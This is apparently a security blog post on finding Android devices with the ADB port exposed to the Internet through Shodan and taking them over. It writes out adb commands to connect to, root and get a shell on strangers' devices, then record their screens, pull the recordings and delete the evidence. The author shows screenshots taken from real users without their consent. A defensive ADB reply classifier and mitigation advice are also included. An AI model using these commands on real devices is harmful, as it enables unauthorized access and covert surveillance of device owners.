# Getting Shell Access to ADB Exposed Smart Devices 📲📺⌚

### Introduction

ADB is widely used by Android developers to debug Android apps and to perform several other tasks, such as pushing/pulling files between an Android device and a PC, installing applications, enabling/disabling verity checks, executing commands, rooting the device, etc.

I love the CLI, so I prefer CLI commands over the UI, and ADB gives me shell access where I can run commands. It also has a feature to expose a TCP port, allowing users to connect over the LAN, but what if this local port is somehow exposed to the Internet, allowing anyone to connect to the device via the exposed ADB port *5555*?

Since Android is an open source project, most companies build their own custom Android images to drive their products. There is a high chance that a smart device is running Android or a variant of it that supports ADB connections.

Can a malicious user connect to such an exposed device?

### Using Shodan To Find Exposed Devices

#### Finding devices using search

```
https://www.shodan.io/search?query=%22Android+Debug+Bridge%3A%22
```

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FYDhkEDSkyPvxMLB9lSTv%2F00-Shodan-Search.png?alt=media&#x26;token=a0188020-5025-4117-9c35-2a87c7d379d6" alt=""><figcaption><p>Shodan Search</p></figcaption></figure>

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FaOAPp6Usw8cXntEwmIiX%2F05-Historical-Trend.png?alt=media&#x26;token=94889399-46db-4558-af6e-2d9855e9ac8f" alt=""><figcaption><p>History of Devices with Exposed ADB port over the Internet</p></figcaption></figure>

There are several devices connected to the Internet with an exposed ADB port. Most of these devices are misconfigured, allowing anyone to connect to them.
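Shodan's "Android Debug Bridge:" banner is built from the CNXN reply a device sends when it completes the ADB handshake without demanding an RSA key. As an added example (not part of the original post), the Python below parses captured ADB replies and separates such open devices from ones that enforce adb authentication (which answer with an AUTH challenge instead); a network defender can run it over TCP payloads seen on port 5555 to confirm whether a device on their own network is exposed. The sample replies are constructed, not real captures.

```python
import struct

# ADB wire header: six little-endian uint32 fields (24 bytes):
# command, arg0, arg1, data_length, data_check, magic (= command ^ 0xFFFFFFFF)
HEADER = struct.Struct("<6I")
A_CNXN = 0x4E584E43  # b"CNXN": connection handshake
A_AUTH = 0x48545541  # b"AUTH": device demands RSA key authentication
ADB_AUTH_TOKEN = 1   # arg0 of an AUTH challenge carrying a random token

def parse_adb_message(buf):
    """Return {cmd, arg0, arg1, payload} or None if buf is not an ADB message."""
    if len(buf) < HEADER.size:
        return None
    cmd, arg0, arg1, length, check, magic = HEADER.unpack_from(buf)
    payload = bytes(buf[HEADER.size:HEADER.size + length])
    if magic != cmd ^ 0xFFFFFFFF or len(payload) != length:
        return None
    # Classic protocol: data_check is the byte sum of the payload; newer adb
    # builds may negotiate checksums off and send 0 instead.
    if check not in (0, sum(payload) & 0xFFFFFFFF):
        return None
    return {"cmd": cmd, "arg0": arg0, "arg1": arg1, "payload": payload}

def classify_adb_reply(buf):
    """Classify a device's first reply to a client CNXN.
    'open': handshake completed with no key check (the misconfiguration that
    puts a device on Shodan); 'auth-required': adb authentication enforced."""
    msg = parse_adb_message(buf)
    if msg is None:
        return "not-adb", {}
    if msg["cmd"] == A_AUTH and msg["arg0"] == ADB_AUTH_TOKEN:
        return "auth-required", {}
    if msg["cmd"] == A_CNXN:
        # Banner form: "device::ro.product.name=..;ro.product.model=..;..."
        text = msg["payload"].rstrip(b"\x00").decode("utf-8", "replace")
        kind, _, props = text.partition("::")
        fields = dict(p.split("=", 1) for p in props.split(";") if "=" in p)
        return ("open" if kind == "device" else "other"), fields
    return "other", {}

def build_message(cmd, arg0, arg1, payload):
    """Frame an ADB message; used here only to construct sample replies."""
    check = sum(payload) & 0xFFFFFFFF
    return HEADER.pack(cmd, arg0, arg1, len(payload), check, cmd ^ 0xFFFFFFFF) + payload

# Constructed sample replies (not real captures): an open device vs. one sending an AUTH token.
OPEN_DEVICE_REPLY = build_message(A_CNXN, 0x01000000, 0x1000,
    b"device::ro.product.name=example_tv;ro.product.model=ExampleTV;"
    b"ro.product.device=example_board;\x00")
AUTH_REPLY = build_message(A_AUTH, ADB_AUTH_TOKEN, 0, bytes(20))
```

Feed `classify_adb_reply` the first server-to-client payload of a TCP stream; anything classified `open` is a device that would accept `adb connect` from any client.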

### Installing ADB Tools For Connecting To A Remote Device

#### Install adb tools on debian based distro

```bash
$ sudo apt install android-tools-adb -y
```

#### Start server and connect to device

```bash
$ adb start-server

# adb connect [IP]:[PORT]
$ adb connect [TARGET_IP]:5555

# list devices
$ adb devices
List of devices attached
[redacted]:5555      device
```

{% hint style="info" %}
Some devices don't accept connections. Try another IP if you're unable to connect to the device.
{% endhint %}

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FNX37YnDIdbzPCGA3qKdF%2F01-Getting-Shell-Access.png?alt=media&#x26;token=dd1b0d95-2ec5-4322-ab32-01a1d3eab217" alt=""><figcaption><p>Getting Shell Access to device</p></figcaption></figure>

I successfully got shell access to one of the exposed devices.

Getting shell access is one of the basic steps for pivoting: once attackers have shell access, they usually try to escalate privileges on the device and then try to compromise other devices on the network. Even without that, an attacker can still damage the system by uploading a malicious/spyware application. As a PoC I'll be capturing the user's screen using shell access.

Let's try to find rooted devices on the Internet. A rooted device gives the attacker complete control over the device.

```bash
# connecting to target machine
$ adb connect [TARGET_IP]:5555

# enabling root on machine
$ adb -s [TARGET_IP]:5555 root

# getting root shell access to the device
$ adb -s [TARGET_IP]:5555 shell
```

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FI1u4lZ3SEfQdSvtJpztB%2F02-adb-root-access.png?alt=media&#x26;token=4d322d8b-a4ef-4a74-b1d2-77c995e76897" alt=""><figcaption><p>Getting Root Access</p></figcaption></figure>

Got a device with root access 🎉

### Capturing Screenshots and Recording Screen

#### Capturing Screenshot and Storing on Attacker's machine

```bash
$ adb -s [TARGET]:5555 exec-out screencap -p > screen.png
```

{% hint style="info" %}
The image will be stored in the current directory as *screen.png*.
{% endhint %}

#### Capturing Screen and Pulling File on Local Machine

```bash
# capture screen for 10 seconds
$ adb -s [device_ip]:5555 screenrecord --time-limit 10 /sdcard/recorded.mp4

# download file
$ adb -s [device_ip]:5555 pull /sdcard/recorded.mp4

# delete file
$ adb -s [device_ip]:5555 shell rm /sdcard/recorded.mp4
```

{% hint style="info" %}
The above commands capture the screen for 10 s, download the file to the current working directory on the local machine, then delete the file from the device.
{% endhint %}

#### Using Above Commands and Capturing Screenshots

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FK1Vu0McQmA8X8v8o4MkC%2F03-getting-screenshot-of-user-activity.png?alt=media&#x26;token=fa843625-8844-4a65-a7f2-6117fcc31fcc" alt=""><figcaption><p>Screenshot Capturing the User's Screen</p></figcaption></figure>

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FDgkdZdRWg9cr7M9Uw1JS%2Fscreen-0.png?alt=media&#x26;token=29976c39-a48e-4d49-82aa-166ed7322b2c" alt=""><figcaption><p>User watching TV</p></figcaption></figure>

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2F50WPVVCZz4ApE6OBjaXe%2Fscreen-1.png?alt=media&#x26;token=89498251-311c-4ae3-9f58-f226f530185f" alt=""><figcaption><p>Captured Screenshot of User Browsing Internet</p></figcaption></figure>

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FAuyjUcCmFjwrNuBzhLbi%2Fscreen.png?alt=media&#x26;token=e6a912cc-3336-4930-8e63-3b91a7480e33" alt=""><figcaption><p>Seems like Exposed Emulator</p></figcaption></figure>

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FlLYwZWOkJfJlCsCrNz5Q%2Fscreen.png?alt=media&#x26;token=a2844a93-edb2-41ca-9349-3f9abbeddf52" alt=""><figcaption><p>User Playing Game on Device</p></figcaption></figure>

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FLsaRkrzfYWvJxOutmAje%2Fscreen.png?alt=media&#x26;token=351fa2da-d882-4b79-b125-c9c214d0cdb6" alt=""><figcaption><p>User Browsing Internet</p></figcaption></figure>

The images above were captured from devices exposed to the Internet, using ADB to get access, while users were browsing the web, watching shows, playing games, etc. I also encountered a ransomware-infected machine asking the victim to pay $100 to a bitcoin address.

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FpKe44OGnEZGcMbhpgADI%2F04-already-compromised.png?alt=media&#x26;token=e64b9f8b-98a8-4845-9608-635cf10681ac" alt=""><figcaption><p>Encountered a Ransomware-Infected Machine</p></figcaption></figure>

<figure><img src="https://2817478997-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fkw6htGm9vTsiShhRVeX3%2Fuploads%2FBe2gjwjqhyETtI06Dyro%2Fscreen.png?alt=media&#x26;token=105f9113-924c-4af7-bd26-29ad4960a1a9" alt=""><figcaption><p>Enlarged Image of the Ransomware-Infected Device</p></figcaption></figure>

Since the ADB port is exposed to the Internet, anyone can connect to the device over the Internet and install a ransomware application.

On searching for ***Nanoware Ransomware*** I couldn't find any traces of such ransomware on the Internet. We cannot trust messages saying "*SORRY I have to feed my family*", since it could be a social engineering technique luring the victim into paying a low-value ransom. But I think this attack wasn't carried out by a ransomware gang; it is more likely an individual, or it could be the initial stage of a gang experimenting with something.

### Conclusion

There are several devices connected to the Internet with their ADB port exposed, allowing an attacker to connect, execute commands, install applications, capture the screen, etc. Most of these devices were Smart TVs, Smart TV boxes, smartphones and smart cameras.

Users should close their ADB connection after use. Devices with the ADB port open shouldn't be exposed to the Internet; individuals should instead use a VPN such as WireGuard/OpenVPN to create a secure network and connect to the device remotely over it.
